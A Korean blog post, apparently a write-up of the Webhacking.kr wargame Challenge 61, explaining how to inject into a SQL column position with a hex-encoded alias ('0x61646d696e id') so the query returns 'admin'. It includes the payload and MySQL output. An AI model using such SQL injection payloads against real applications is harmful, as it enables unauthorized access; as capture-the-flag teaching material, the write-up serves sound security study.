티스토리 뷰

Wargame/Webhacking.kr

Challenge 61

do9dark 2015. 9. 10. 04:14

source 가 주어져 있다.



id 파라미터가 없을 경우 $_GET[id] 는 guest가 입력이 된다.

$_GET[id] 파라미터에는 아래와 같은 문자가 있거나 18글자 이상이 되면 Access Denied가 발생한다.


select $_GET[id] from c_61 order by id desc limit 1

다른 문제들과 달리 특이하게 컬럼 위치에 입력한 값이 들어가는 것을 볼 수 있다.

그리고 id 컬럼의 값으로 admin이 나오면 문제를 해결할 수 있다.



?id=id 해서 Query를 완성시켜주면 아래와 같이 zombie 라는 값이 출력되는 것을 볼 수 있다.



admin을 만들어주기 위해서는 별칭을 이용하면 쉽게 해결할 수 있다.

?id=0x61646d696e id

또는

?id=0x61646d696e as id

와 같은 방법으로 값을 넣어주면 아래와 같은 결과를 얻을 수 있다.


mysql> select 0x61646d696e id;
+-------+
| id    |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
cs



'Wargame > Webhacking.kr' 카테고리의 다른 글

*** All Clear ***  (0) 2015.09.10
Challenge 61  (0) 2015.09.10
Challenge 60  (0) 2015.09.10
Challenge 59  (0) 2015.09.10
Challenge 58  (0) 2015.09.09
Challenge 57  (0) 2015.09.08
Challenge 56  (0) 2015.09.07
Challenge 55  (0) 2015.09.06
Challenge 54  (0) 2015.09.06
Challenge 53  (0) 2015.09.06
Challenge 52  (0) 2015.09.06
댓글
댓글쓰기 폼
«   2020/07   »
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  
링크
공지사항
Total
103,582
Today
1
Yesterday
64